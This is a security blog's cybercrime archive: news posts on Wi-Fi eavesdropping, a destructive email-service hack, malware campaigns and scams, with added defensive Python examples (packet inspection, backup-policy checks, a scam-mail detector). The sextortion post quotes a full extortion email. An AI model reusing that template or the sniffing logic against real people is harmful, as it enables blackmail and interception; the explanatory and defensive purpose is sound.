Category Archives: Cybercrime

The Risks of Public Wi-Fi and How to Close the Security Gap

As I write this blog post, I’m digitally exposed, and I know it. For the past week, I’ve had to log on to a hospital’s public Wi-Fi each day to work while a loved one recuperates.

What seems like a routine, casual connection to the hospital’s Wi-Fi isn’t. Using public Wi-Fi is a daily choice loaded with risk. Sure, I’m conducting business and knocking out my to-do list like a rock star but at what cost to my security?

The Risks

By using public Wi-Fi, I’ve exposed my online activity and the personal data on my laptop to a variety of threats, including eavesdropping, malware distribution, and cryptocurrency mining (cryptojacking). There’s even a chance I’ve connected to a malicious hotspot set up to look like the hospital network, an “evil twin” that lets an attacker watch and tamper with everything I send.

Like many public Wi-Fi spots, the hospital’s network could lack encryption, the security measure that scrambles the information sent between my laptop and the hospital’s access point so that other people can’t read it. On an open network, anyone within radio range can capture that traffic, and whatever isn’t separately protected by the application itself (for example, by HTTPS) could be read and used by cybercriminals.

Because logging on to public Wi-Fi is often a necessity — like my situation this week — security isn’t always the first thing on our minds. But over the past year, a new normal is emerging. A lot of us are thinking twice. With data breaches, privacy concerns, the increase in the market for stolen credentials, and increasingly sophisticated online scams making the headlines every day, the risks of using public Wi-Fi are front and center.

Rising Star: VPN

The usual answer to risky public Wi-Fi is a Virtual Private Network (VPN). A VPN builds an encrypted tunnel from your device to a server run by the VPN provider and sends all of your traffic through it, so the hotspot operator and anyone else on the local network see only encrypted packets headed for the VPN server. Because the sites you visit see the VPN server’s IP address rather than yours, it also hides your real IP address and approximate location from them. Note what a VPN does not do: the provider can see your traffic as it leaves its server, so you are moving trust from the coffee shop or hospital to the provider, and a VPN does nothing about malware already on your device or a phishing page you choose to log in to.

Using a VPN takes away the easiest attack available to someone on public Wi-Fi: passively sniffing, or tampering with, the traffic of everyone else on the same network.

Who Needs a VPN?

If you (or your family members) travel and love to shop online, access your bank account, watch movies, and do everyday business via your phone or laptop, a VPN would allow you to connect safely and encrypt your data no matter where you are.

Inside the tunnel, your banking credentials and card numbers are unreadable to anyone on the hotspot, and the sites you visit see the VPN server’s address rather than your own.

Also, if you have a family data plan, you’ve likely encouraged your kids to save data by connecting to public Wi-Fi whenever possible. With a VPN on their devices, that habit is protected from sniffers and snoopers on the same network.

The VPN server forwards your traffic to the sites you visit, so you get an encrypted link almost anywhere you go and your real IP address is hidden from those sites. That is not the same as browsing anonymously: the VPN provider can see who you are and where you connect, and any account you log in to still identifies you.

How VPNs work

To use a VPN, you subscribe to a VPN service, install its app on your laptop or phone, set up your account, and then connect to a VPN server before doing anything else online. Most apps offer a “kill switch” that blocks traffic if the tunnel drops; turn it on, or a moment’s disconnection will silently send your traffic over the raw hotspot.

If you are still logging on to public Wi-Fi, here are a few tips to keep you safe until VPNs become as popular as Wi-Fi.

Stay Safe on Public Wi-Fi 

Verify your connection. Fake networks that capture your traffic are common. If you are logging on to Wi-Fi in a coffee shop, hotel, airport, or library, verify the exact name of the network with an employee. Prefer networks that require a password to join, but understand the limit of that protection: on a network that uses a shared WPA2 password, anyone who knows the password and captures your connection handshake can decrypt your traffic, so a password printed on the menu keeps out strangers, not other customers.

Don’t get distracted. For adults, as well as kids, it’s easy to get distracted and absorbed with our screens — this is risky when on public Wi-Fi, according to Diana Graber, author of Raising Humans in a Digital World. “Knowing how to guard their personal information online is one of the most important skills parents need to equip their young kids with today,” says Graber. “Lots of young people visit public spaces, like a local coffee shop or library, and use public Wi-Fi to do homework, for example. It’s not uncommon for them to get distracted by something else online or even tempted to buy something, without realizing their personal information (or yours!) might be at risk.”

Disable auto Wi-Fi connect. If your phone automatically joins surrounding networks, you can disable this function in your settings. Avoid linking to unknown or unrecognized networks.

Turn off Wi-Fi when done. Your computer or phone can still transmit data even when you are not using it. Be sure to disable your Wi-Fi from the network when you are finished using it.

Avoid financial transactions. If you must use public Wi-Fi, don’t conduct a sensitive transaction such as banking, shopping, or any kind of activity that requires your social security or credit card numbers or password use. Wait until you get to a secured home network to conduct personal business.

Look for the HTTPS. HTTPS encrypts your traffic to the site end to end, so on an open network it is the main thing standing between your password and anyone sniffing the air; never enter credentials on a page served over plain HTTP. Do not read the lock icon as proof that a site is legitimate, though: phishing sites routinely obtain valid certificates, so the lock tells you the connection to the address in the bar is encrypted, not that the address is the one you meant to visit.

Secure your devices. Use a personal VPN as an extra layer of security against hackers and malware.
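To make the eavesdropping risk described at the top of this post, and the HTTPS tip above, concrete, here is an added example written for this page; it is not code from the McAfee post. The script plays the role of someone sniffing an open network: it takes the raw bytes of two constructed packets, a plaintext HTTP login and the TLS ClientHello that would start an HTTPS session to the same site, and reports what each one gives away. The hostname, credentials and the fixed client random are made up for the sample.

```python
import struct
from urllib.parse import parse_qs

# --- Constructed sample 1: a login form submitted over plain HTTP ---------------
_BODY = b"username=alice&password=hunter2%21"
HTTP_LOGIN = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: bank.example\r\n"                       # hypothetical host
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    + b"Content-Length: %d\r\n" % len(_BODY)
    + b"\r\n" + _BODY
)

def inspect_http(payload: bytes) -> dict:
    """Everything in a plaintext request is readable: host, path and form fields."""
    head, _, body = payload.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    form = {k: v[0] for k, v in parse_qs(body.decode("latin-1")).items()}
    return {"protocol": "http", "host": headers.get("host"),
            "method": method, "path": path, "form": form}

# --- Constructed sample 2: the first packet of a TLS session to the same host ---
def build_client_hello(server_name: str) -> bytes:
    """Minimal TLS-framed ClientHello carrying only a server_name (SNI) extension."""
    name = server_name.encode("ascii")
    sni_entry = b"\x00" + struct.pack("!H", len(name)) + name   # name_type host_name
    sni_list = struct.pack("!H", len(sni_entry)) + sni_entry
    ext = struct.pack("!HH", 0x0000, len(sni_list)) + sni_list  # extension type 0 = SNI
    extensions = struct.pack("!H", len(ext)) + ext
    body = (b"\x03\x03" + b"\x11" * 32   # client_version + fixed (fake) client random
            + b"\x00"                     # session_id length 0
            + b"\x00\x02\x13\x01"         # one cipher suite: TLS_AES_128_GCM_SHA256
            + b"\x01\x00"                 # one compression method: null
            + extensions)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body    # HandshakeType client_hello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake

def parse_sni(record: bytes):
    """Walk the ClientHello and return the server_name, the one field a sniffer gets."""
    if record[0] != 0x16 or record[5] != 0x01:    # not a handshake record / not ClientHello
        return None
    hs = record[5:]
    p = 4 + 2 + 32                                # handshake header, version, random
    p += 1 + hs[p]                                # session_id
    p += 2 + struct.unpack("!H", hs[p:p + 2])[0]  # cipher_suites
    p += 1 + hs[p]                                # compression_methods
    end = p + 2 + struct.unpack("!H", hs[p:p + 2])[0]
    p += 2
    while p + 4 <= end:
        ext_type, ext_len = struct.unpack("!HH", hs[p:p + 4])
        p += 4
        if ext_type == 0x0000:
            q = p + 2                             # skip server_name_list length
            name_len = struct.unpack("!H", hs[q + 1:q + 3])[0]
            if hs[q] == 0x00:                     # host_name entry
                return hs[q + 3:q + 3 + name_len].decode("ascii")
        p += ext_len
    return None

def eavesdrop(payload: bytes) -> dict:
    """What a passive sniffer on the same open Wi-Fi learns from one packet."""
    if payload[:1] == b"\x16":
        return {"protocol": "tls", "host": parse_sni(payload), "form": {}}
    return inspect_http(payload)

if __name__ == "__main__":
    print(eavesdrop(HTTP_LOGIN))
    print(eavesdrop(build_client_hello("bank.example")))
```

The plaintext request hands over the username and password; the TLS packet reveals only which host is being contacted (the SNI is sent in the clear in both TLS 1.2 and 1.3 unless Encrypted Client Hello is in use). That split is why HTTPS protects the content of what you send on a hotspot, while a VPN additionally hides which sites you are talking to from the people around you.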

The post The Risks of Public Wi-Fi and How to Close the Security Gap appeared first on McAfee Blogs.

Hacker destroys VFEmail service, wipes backups

An email service called VFEmail was essentially put out of business after a hack intended to delete everything in (and out of) sight.

“Yes, @VFEmail is effectively gone. It will likely not return. I never thought anyone would care about my labor of love so much that they’d want to completely and thoroughly destroy it.”

This wasn’t “just” a simple webpage compromise, or some sort of database dump. In fact, it was something altogether worse: put simply, the total annihilation of a service and most, if not all, of its infrastructure.

What happened?

Users of VFEmail woke to the following message on the service’s website:


!!!ALERT!!!! Update Feb 11 2019

vfemail(dot)net and mail(dot)vfemail(dot)net are currently unavailable.

We have suffered catastrophic destruction at the hands of a hacker, last seen as aktv[redacted]

This person has destroyed all data in the US, both primary and backup systems. We are working to recover what data we can.

New updates 2/11/19 6pm CST:

Incoming mail is now being delivered.

Webmail is up. Note: mailboxes are created upon new mail delivery. If you cannot login, you may not have received mail.

Mailboxes are new, no subfolders exist.

No filters are in place. If you created a filter with Horde, Login to Horde, Create any folders you need. 

Click Filter, Click Script, then click ‘Activate Script’.

There is no spam scanning at this time – Incoming mail may be Spam scanned depending on DNS status.

Free users should not attempt to send email, there is currently no delivery mechanism for free accounts. Paid accounts should be useable, including Horde/Roundcube contacts and calendars.

At this time I am unsure of the status of existing mail for US users. If you have your own email client, DO NOT TRY TO MAKE IT WORK.

If you reconnect your client to your new mailbox, all your local mail will be lost.

Ouch.

Did they put word out on social media?

You bet they did, and the tweets don’t make for pleasant reading.

It may sound a bit exciting to walk in on the scene of the crime, but I can assure you it’d only involve lots of “oh no” types of expression. If they’re already wiping your backups, the game is indeed over.

Did they recover?

Sadly things didn’t improve, and a few hours later the full damage report was available.

All data was encrypted at least, but said data basically vanished into thin air when it was scrubbed.

The attacker also managed to destroy VMs that used different forms of authentication, so a single stolen password does not account for everything that was lost.

“Just attack and destroy”

Services and sites have been attacked severely in the past, some to the point of destruction. However, there’s almost always an overt reason given, or a ransom, or some other clue.

Here, it’s nothing but complete devastation, and a service in existence since 2001 absolutely ruined in the bargain. There’s no indication of how the attacker got in, nor of whether an important system lacked multi-factor authentication; a number of commentators have suggested a missing second factor as a plausible way in.

Until detailed analysis is published, it’s hard to say why this happened. Did the owner of the service aggravate a talented hacker? Or could one of the service users have drawn attention from unwanted sources, and this is the end result? It’ll be fascinating to find out. But if you operate a similar service, you may wish to consider a decent offline backup system in the meantime. The lesson of this incident is that a backup reachable with the same credentials, from the same network, as production is not really a backup: whoever owns production can delete it too. Keep at least one copy that production can write to but not delete, or that production cannot reach at all.
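One concrete way to act on that advice is to make sure the credentials production uses to write backups cannot also delete them. The following is an added example for this page, not code from the Malwarebytes post and not VFEmail’s setup (which has not been published). It assumes backups are written to an S3 bucket and checks an IAM identity policy for the actions that would let a compromised production host destroy the backups or strip the controls (versioning, Object Lock, lifecycle rules) that protect them. Both policy documents and the bucket name are constructed for the sample.

```python
import fnmatch
import json

# S3 actions that let whoever holds the credential destroy backups or remove the
# controls that protect them. Restores are done by a different identity.
DESTRUCTIVE_ACTIONS = {
    "s3:DeleteObject", "s3:DeleteObjectVersion", "s3:DeleteBucket",
    "s3:PutBucketVersioning", "s3:PutLifecycleConfiguration",
    "s3:PutBucketObjectLockConfiguration", "s3:PutObjectRetention",
    "s3:BypassGovernanceRetention", "s3:PutBucketPolicy",
}

def _as_list(value):
    if value is None:
        return []
    return [value] if isinstance(value, str) else list(value)

def _matching(patterns, candidates):
    """IAM action matching: case-insensitive, with '*' and '?' wildcards."""
    return {a for a in candidates
            if any(fnmatch.fnmatchcase(a.lower(), p.lower()) for p in patterns)}

def destructive_actions_granted(policy: dict) -> set:
    """Destructive actions the policy allows once explicit Denies are subtracted.
    Resource and Condition elements are deliberately ignored, so a Deny scoped to
    one bucket still counts as covering another: the check errs on the safe side."""
    stmts = policy.get("Statement", [])
    if isinstance(stmts, dict):
        stmts = [stmts]
    allowed, denied = set(), set()
    for stmt in stmts:
        hits = _matching(_as_list(stmt.get("Action")), DESTRUCTIVE_ACTIONS)
        if stmt.get("Effect") == "Allow":
            allowed |= hits
        elif stmt.get("Effect") == "Deny":
            denied |= hits
    return allowed - denied

def backup_writer_is_write_only(policy_json: str) -> bool:
    return not destructive_actions_granted(json.loads(policy_json))

# Constructed: the convenient policy, which also lets an intruder wipe the bucket.
WEAK_POLICY = """{
  "Version": "2012-10-17",
  "Statement": [{"Effect": "Allow", "Action": "s3:*",
                 "Resource": ["arn:aws:s3:::mail-backups", "arn:aws:s3:::mail-backups/*"]}]
}"""

# Constructed: write-only. The bucket is expected to have versioning and Object Lock
# turned on, so even PutObject cannot overwrite history; the Deny is belt and braces.
HARDENED_POLICY = """{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow",
     "Action": ["s3:PutObject", "s3:AbortMultipartUpload", "s3:ListBucket"],
     "Resource": ["arn:aws:s3:::mail-backups", "arn:aws:s3:::mail-backups/*"]},
    {"Effect": "Deny",
     "Action": ["s3:Delete*", "s3:PutBucket*", "s3:PutObjectRetention",
                "s3:BypassGovernanceRetention", "s3:PutLifecycleConfiguration"],
     "Resource": "*"}
  ]
}"""

if __name__ == "__main__":
    for name, doc in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(name, sorted(destructive_actions_granted(json.loads(doc))))
```

A write-only policy on its own is not enough: with plain PutObject an intruder can still overwrite every backup object with garbage. Versioning keeps the earlier versions, and Object Lock in compliance mode stops anyone, including the account owner, from deleting those versions until the retention period ends. Run the check against the real policy attached to the backup role, not a copy of what you think it says.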

The post Hacker destroys VFEmail service, wipes backups appeared first on Malwarebytes Labs.

Bank of Valletta suspended all operations in wake of cyber attack

Maltese Bank of Valletta (BOV) has been breached by hackers and has temporarily suspended all of its operations to minimize risk and review its systems. The bank shuttered its branches across the island, disabled ATMs, internet and mobile banking, and prevented its customers from using BOV cards to make payments in stores, hotels, restaurants, etc. What is known about the attack? According to Times of Malta, the attack was detected shortly after the start of … More

The post Bank of Valletta suspended all operations in wake of cyber attack appeared first on Help Net Security.

Trickbot becomes one of the most dangerous pieces of modular malware hitting enterprises

Along with Emotet, Trickbot has become one of the most versatile and dangerous pieces of modular malware hitting enterprise environments. Most recently, its creators have added another dangerous module to it, which allows it to extract and exfiltrate credentials from popular remote access software. Trickbot’s evolution Like Emotet, Trickbot started as a pure banking Trojan but was slowly developed through the years and now has many more additional capabilities. It can: Achieve persistence (through scheduled … More

The post Trickbot becomes one of the most dangerous pieces of modular malware hitting enterprises appeared first on Help Net Security.

Most wanted malware in January 2019: A new threat speaks up

Check Point’s Global Threat Index for January 2019 reveals a new backdoor Trojan affecting Linux servers, which is distributing the XMRig crypto-miner. The new malware, dubbed SpeakUp, is capable of delivering any payload and executing it on compromised machines. The new Trojan currently evades all security vendors’ anti-virus software. It has been propagated through a series of exploitations based on commands it receives from its control center, including the 8th most popular exploited vulnerability, “Command … More

The post Most wanted malware in January 2019: A new threat speaks up appeared first on Help Net Security.

Indictment: Hackers Charged With Making Threats to Schools

Two computer hackers were charged with sending false shooting and bomb threats to hundreds of schools and other institutions in the U.S. and Britain, federal prosecutors said Tuesday.

The men are members of Apophis Squad, a worldwide collective of hackers intent on using the internet to “sow chaos,” the Department of Justice said in Los Angeles.


Healthcare email fraud: Attack attempts jump 473% over two years

Proofpoint found that healthcare organisations were targeted in 96 email fraud attacks on average in Q4 2018 – a 473 percent jump from Q1 2017. More than half of these organisations (53 percent) were attacked more often, with incidents up between 200 and 600 percent during the two-year period. Researchers analysed more than 160 billion emails sent across 150 countries in both 2017 and 2018 to identify email fraud attack trends targeting more than 450 … More

The post Healthcare email fraud: Attack attempts jump 473% over two years appeared first on Help Net Security.

Impersonation, sender forgery and corporate email spoofing top the charts

Q4 2018 was a busy period for phishing scammers. INKY researchers saw a spike in email volume at this time of year as people use email to gather their receipts from online shopping, shipping notifications, returns, and virtual holiday greetings. For its 2018 Q4 email security report, the company pulled out the highest volume attack types and broke down each one. The majority of attacks that were analyzed showed an increase in target personalization, … More

The post Impersonation, sender forgery and corporate email spoofing top the charts appeared first on Help Net Security.

Sextortion Bitcoin scam makes unwelcome return

Heads up: a particularly nasty sextortion Bitcoin scam from at least the middle of 2018 is making the rounds once again.

The scam involves making use of old breach dumps, then emailing someone from the list and reminding them of their old password.

When something lands in your mailbox with “Hey, remember this?” it’s a surefire way to focus the reader’s attention. Pressure is then applied to start sending over some Bitcoin…or else.

What is the threat being made?

The generally accepted theory is that the scammer digs up personally identifiable information from old data breaches, including email addresses and passwords, plugs it into some sort of automated script, and then fires out thousands of emails.

Those mails reach people from said breach, and they then see talk of somebody “knowing” their login details. That’s then used as leverage to claim the attacker has access to their PC, files, folders, webcams, browsing history—in a nutshell, anything personal and sensitive. The scarier they can make it sound, the better. In fact, one of the more eye-popping claims is that the scammer has video of the user viewing adult websites, and they will share this video with all the user’s contacts unless they pony up and pay a Bitcoin ransom.

And in classic ransomware fashion, there’s typically a ticking clock. Giving users a short time limit to deliver the payment is social engineering at its finest.

What next?

The recipient may well have a panic attack, that’s what. To be suddenly confronted with an ancient (but potentially still active) password is certainly going to give a bit of a shock to the system. It’s at this point the confusion sets in, as they start to wonder what on Earth the attacker has. Did they really see what they claimed to see? Do they actually have video footage? What other potentially embarrassing (or worse) content could they use to extort and blackmail?

What do they really have?

A large throne of lies, is what.

Yes, they have your password from a long time ago.

No, they do not have access to your computer. And no, even if you were checking out adult sites, they don’t have video of you doing so.

What they might have is access to your email account associated with the breach, if you haven’t changed the password since it took place. They could also potentially start trying to log into other accounts you have with the same password. If this is the case, you should fire up a password manager and get to work changing things.

In fact, you should do that if you share passwords across accounts in any case.

Okay, back to the scam.

What does the email say?

It’s a fairly standard template, and hunting for portions of the below mail will throw up any number of hits in Google and other search engines.


The email reads as follows:

I am well aware [REDACTED] is your pass words. Lets get right to point. Neither anyone has paid me to investigate you. You may not know me and you are probably thinking why you’re getting this e-mail? 

actually, i installed a software on the adult videos (pornographic material) web-site and do you know what, you visited this website to have fun (you know what i mean). While you were viewing videos, your web browser began working as a Remote Desktop that has a keylogger which gave me accessibility to your display and also cam. Just after that, my software gathered every one of your contacts from your Messenger, Facebook, as well as email . after that i created a double video. 1st part displays the video you were viewing (you’ve got a nice taste haha), and next part shows the recording of your cam, yeah its you. 

You have not one but two choices. Shall we read up on these options in aspects: 

First alternative is to just ignore this message. in such a case, i am going to send out your actual video to every single one of your personal contacts and think regarding the awkwardness you will definitely get. and definitely if you happen to be in a loving relationship, how it would affect? 

Number 2 solution is to pay me $889. Lets name it as a donation. in this situation, i most certainly will asap remove your video footage. You could carry on daily life like this never occurred and you surely will never hear back again from me.

You’ll make the payment through Bi‌tco‌in (if you don’t know this, search for ‘how to buy b‌itcoi‌n’ in Google). 

B‌T‌C‌ ad‌dre‌ss to send to: [REDACTED]

[CaSe sensitive, copy & paste it] 

if you are wondering about going to the law enforcement officials, well, this message can not be traced back to me. I have dealt with my actions. i am also not attempting to demand a huge amount, i would like to be compensated. within this%} emaiQUNdkpeC [SIC] if i do not receive the ‌bi‌tco‌in‌, i will send your video recording to all of your contacts including family members, coworkers, and so forth. Having said that, if i receive the payment, i will erase the recording immediately. If you really want proof, reply Yup then i will send out your video to your 9 friends. This is a non-negotiable offer, so don’t waste mine time and yours by replying to this e mail.
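Notice that “Bitcoin” in the mail above is broken up with invisible zero-width characters, a trick aimed at keyword filters that never see the whole word. As an added example (not code from the Malwarebytes post), here is a small Python classifier that strips those characters before matching and then scores a message on the hallmarks of this template: a quoted old password, a webcam/video claim, the adult-site pretext, a threat to contact everyone, a deadline, and a Bitcoin address. The two sample messages, the password and the address in them are constructed; the address has the right shape but is not checksum-valid.

```python
import re
import unicodedata

# Constructed sample in the style of the mail above: "Bitcoin" is split with U+200C
# (zero-width non-joiner) so a naive keyword filter does not see the word.
SAMPLE_SEXTORTION = (
    "I am well aware hunter2 is your pass words. I installed a software on the adult "
    "videos web-site and recorded your cam while you were viewing videos. I gathered "
    "every one of your contacts. Pay $889 in Bi\u200ctco\u200cin within 24 hours to "
    "1Ab2Cd3Ef4Gh5Jk6Mn7Pq8Rs9Tu2Vw3Xy4Z or I send the video to all your contacts."
)
SAMPLE_BENIGN = "Hi, attached is the invoice for last month. Let me know if you have questions."

# Legacy (1.../3...) base58 addresses or bech32 (bc1...) ones. This is a shape check,
# not a validator; the constructed address above would fail a checksum test.
BTC_ADDRESS = re.compile(r"\b(?:bc1[02-9ac-hj-np-z]{11,71}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})\b")

INDICATORS = {
    "mentions_bitcoin": re.compile(r"\b(?:bitcoin|btc)\b"),
    "quotes_old_password": re.compile(r"\b(?:pass ?words?|password)\b"),
    "claims_webcam_video": re.compile(r"\b(?:web)?cam\b|\bvideo\b"),
    "threatens_contacts": re.compile(r"\bcontacts\b"),
    "adult_site_pretext": re.compile(r"\b(?:adult|porn\w*)\b"),
    "deadline": re.compile(r"\b\d+\s*(?:hours?|days?)\b"),
}

def strip_zero_width(text: str) -> str:
    """Remove Unicode format characters (category Cf): ZWSP, ZWNJ, ZWJ, word joiner
    and friends, which scammers insert to break up keywords without changing the
    rendered text."""
    return "".join(ch for ch in text if unicodedata.category(ch) != "Cf")

def analyze(text: str) -> dict:
    visible = strip_zero_width(text)
    lowered = visible.casefold()
    hits = {name: bool(rx.search(lowered)) for name, rx in INDICATORS.items()}
    hits["btc_address"] = bool(BTC_ADDRESS.search(visible))   # base58 is case-sensitive
    hits["zero_width_obfuscation"] = len(visible) != len(text)
    score = sum(hits.values())
    return {"hits": hits, "score": score,
            "verdict": "sextortion" if score >= 4 else "no match"}

if __name__ == "__main__":
    for msg in (SAMPLE_SEXTORTION, SAMPLE_BENIGN):
        print(analyze(msg))
```

The presence of zero-width characters inside an ordinary English word is itself a strong signal, independent of the keywords, and is worth its own rule in a mail filter; legitimate mail almost never contains them mid-word.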

That’s pretty sneaky

It is, and I’d be surprised if there aren’t many others waking up to emails identical to the above. Should you receive one yourself, do the following:

  1. Don’t panic. They absolutely do not have the keys to your computer.
  2. See if the email address in question pops up over on Haveibeenpwned.
  3. See if your password does the same thing, using the site’s Pwned Passwords search (it submits only a partial hash of the password, so the password itself never leaves your browser).
  4. At this point, you may have a fairly good idea which breach they grabbed your old login from, which is always useful information to have.
  5. Delete the email you were sent, and under no circumstances pay them a penny/dime/insert currency of choice here.
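Step 3 above works because the Pwned Passwords service uses k-anonymity: you send the first five hex characters of the password’s SHA-1 and get back every known suffix with that prefix, then match locally. The following is an added example (not code from the Malwarebytes post) showing that exchange in Python. The function takes the fetcher as a parameter so the offline run uses a constructed stand-in for the service with made-up passwords and counts; `live_range` is the real fetcher and needs network access. The real endpoint is `https://api.pwnedpasswords.com/range/<prefix>`; the optional `Add-Padding` header, which makes the service pad its answer with dummy `:0` lines, is a documented feature, not an assumption.

```python
import hashlib
from typing import Callable, Dict

def pwned_count(password: str, fetch_range: Callable[[str], str]) -> int:
    """Look a password up in Pwned Passwords without sending it anywhere.
    Only the first five hex characters of its SHA-1 leave the machine; the service
    returns every suffix sharing that prefix and the match is made locally."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    prefix, suffix = digest[:5], digest[5:]
    for line in fetch_range(prefix).splitlines():
        candidate, _, count = line.strip().partition(":")
        if candidate == suffix:
            return int(count or 0)      # padded responses carry ":0" entries
    return 0

def live_range(prefix: str) -> str:
    """Real fetcher: GET https://api.pwnedpasswords.com/range/<prefix> (needs network)."""
    from urllib.request import Request, urlopen
    req = Request(f"https://api.pwnedpasswords.com/range/{prefix}",
                  headers={"User-Agent": "pwned-check-example", "Add-Padding": "true"})
    with urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")

# Constructed offline stand-in for the service: a tiny "breach" with made-up counts,
# answered in the same SUFFIX:COUNT format the real endpoint uses.
FAKE_BREACH: Dict[str, int] = {"hunter2": 12345, "password1": 2_000_000, "letmein": 999}

def fake_range(prefix: str) -> str:
    lines = []
    for pw, count in FAKE_BREACH.items():
        h = hashlib.sha1(pw.encode("utf-8")).hexdigest().upper()
        if h[:5] == prefix:
            lines.append(f"{h[5:]}:{count}")
    lines.append("0" * 35 + ":0")       # one padding line, as the real API may send
    return "\r\n".join(lines)

if __name__ == "__main__":
    for pw in ("hunter2", "correct horse battery staple 7!"):
        print(pw, "->", pwned_count(pw, fake_range))
```

Swap `fake_range` for `live_range` to query the real service. A non-zero count means the password has appeared in a breach and should be retired everywhere it was used, whether or not a scammer has mailed it back to you yet.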

Scare tactics: an evil practice

The anonymous sender of these mails doesn’t care about the trauma they could cause at the other end. These missives would be particularly traumatic for anyone involved in (say) a revenge porn case previously. And make no mistake, generic Internet blackmail threats can kill.

If you’re able to report these mails for spam/abuse before deleting, do so. There’s a remote chance you could actually save someone’s life while making the Internet a little safer into the bargain.

The post Sextortion Bitcoin scam makes unwelcome return appeared first on Malwarebytes Labs.

Zero trust browsing: Protect your organization from its own users

To the casual observer, the cyberattack landscape is constantly shifting. In recent years, the threats and scams have evolved from Nigerian princes to stranded travelers, pop-ups warning of outdated software to ransomware, cryptojacking, phishing and spear phishing. Predictions for 2019 are full of dire warnings about the very-real explosion of phishing, backed by geometric increases in phishing sites as the number of malware sites drops. Just as 2018 predictions focused on cryptojacking and ransomware were … More

The post Zero trust browsing: Protect your organization from its own users appeared first on Help Net Security.

Average DDoS attack volumes grew by 194% in 12 months

The volume and complexity of DDoS attacks continued to grow in Europe during the final quarter of 2018, according to Link11. While Link11’s Security Operations Center (LSOC) registered 13,910 attacks in Q4 (12.7% down compared to Q3), the average attack volume grew by 8.7% to 5Gbps, and 59% of attacks used multiple attack vectors. Key findings of Link11’s Q4 DDoS report include: Average attack volumes grew by 194% in 12 months: In Q4 2018, average … More

The post Average DDoS attack volumes grew by 194% in 12 months appeared first on Help Net Security.

E Hacking News – Latest Hacker News and IT Security News: Android Spyware "Triout" Back With Spying Abilities And New Malicious Schemes






An Android spyware family that hides inside a copy of an online privacy app has resurfaced in a more capable and more malicious build.

Triout was first identified in August 2018, when it was caught hiding in an adult-content application; that campaign had been active since May of the same year. It stood out because of how much it harvested: photos, text conversations, recorded phone calls and GPS coordinates, the last of which exposes the victim’s movements.

The new campaign changes the disguise. The malware is now distributed inside a repackaged copy of Psiphon, a legitimate censorship-circumvention tool from Google Play that has been downloaded about a million times. Because the attackers cannot get their trojanized copy onto Google Play, it is offered through third-party download sites. The fake Psiphon looks and behaves exactly like the real one; the interface has been copied faithfully, so nothing about it invites suspicion.

To stay under the radar, Triout is aimed at a narrow set of victims; when the new build was discovered it was targeting users in Germany and South Korea. Spear-phishing is reportedly used to get those targets to install the app, and both the lures and the command-and-control setup have been reworked to improve the success rate.

Updated Triout samples have reportedly been uploaded from several places around the world, among them Russia, France and the US. The origin of the campaign and the people behind it are still unknown.

Security researchers describe the application as built for espionage. Their advice: install apps only from official stores, and steer clear of anything that looks suspicious.




Valentine’s Alert: Don’t Let Scammers Break Your Heart or Your Bank Account

It’s hard to believe that as savvy as we’ve become about our tech, people are still getting catfished, scammed, and heartbroken in their pursuit of love online.

The dinner conversation between bystanders goes something like this: “How could anyone be so dumb? Seriously? If they are going to be that reckless and uninformed, then maybe they deserve what they got!”

Some friends and I recently had a similar conversation about online dating scams. I noticed, however, that one friend, Sarah*, wasn’t so eager to jump into the conversation. She shrunk back in the booth and quietly sipped her margarita. Only later did she share her story with me.

The power of love

Sarah, a well-educated, attractive single mom in her late 40s, had been talked into joining a dating site the year before by her teenager. She was especially lonely after her divorce three years earlier, so she agreed to create a profile on a popular dating app. After a handful of dates fell flat, she found Scott. He was charismatic and kind. “We had an instant connection,” according to Sarah. They spent hours on the phone sharing their deepest secrets and even started imagining a future together. But after about three months, Scott fell on hard times. At first, he needed to borrow $400 for airfare to visit a dying relative, which he paid back immediately. Over the next few months, the sums grew: $1,000 for rent, then $3,000 for a business venture.


Before long, Sarah had loaned her new love over $8,500. When she pressed him to repay the money, Scott ghosted Sarah online, moved out of town, and she never saw him again. My friend didn’t share her story with many people. She didn’t report it. She was too embarrassed and humiliated and even became depressed following what she calls “the Scott scam.” Her trust in other people and in love itself has been obliterated.

Sarah’s story isn’t one of a desperate, clueless person or a lonely older woman. Scammers are targeting good people who still believe in and value love and companionship, and the pursuit of love online extends to adults as well as teens.

Confidence Fraud

Law enforcement calls these kinds of online romance scams confidence fraud because scammers will take a considerable amount of time gaining the trust and confidence of their victims. They will appear empathetic and supportive as they gather personal information they can use over time to carry out their scam.

According to the Federal Bureau of Investigation (FBI) confidence fraud has jumped 20% in the past year despite reports and warnings — especially around this time of year.

The FBI’s Internet Crime Complaint Center (IC3) reports that romance scams top all other financial online crimes. In 2016, people reported almost 15,000 romance scams to IC3 (nearly 2,500 more than the previous year), with losses exceeding $230 million.

Tips for Safe Online Dating

Never send money. Be it a romantic relationship you’ve engaged with or a phishing email, no matter the sob story, do not send money to anyone online. If you do send money, put a loan agreement in place that is legally enforceable should one party default.

Suspicious behavior. If someone promises to meet you somewhere but keeps canceling, or if he or she refuses to video chat, those are red flags. Technology means anyone from anywhere in the world can successfully maintain a scam.

Take things slow. If someone is pushing the pace of a relationship or too quick to declare love and talk about the future, pause and assess the situation.

Do a background check. Love is a powerful force and can easily cloud a person’s correct understanding of reality. If you dare to create a dating profile, make a deal with yourself that you will extend the same courage to doing a background check on someone.

Be a sleuth. Don’t be afraid to gather facts on someone you’ve met online. Simple steps such as Googling the person’s name or dropping their photo in Google’s Reverse Image Search will help you get a better understanding of a person. Have faith: Good, legitimate people do exist. However, if there’s anything dubious, it’s best to find it out earlier rather than later. Part of doing your homework is tracking down mutual friends and making inquiries about the person you are talking with online.

Keep your social profiles private. Experts agree that you should edit your online footprint before you start dating people you’ve met online. Making your Instagram, Twitter, and Facebook private will guard you against potential.

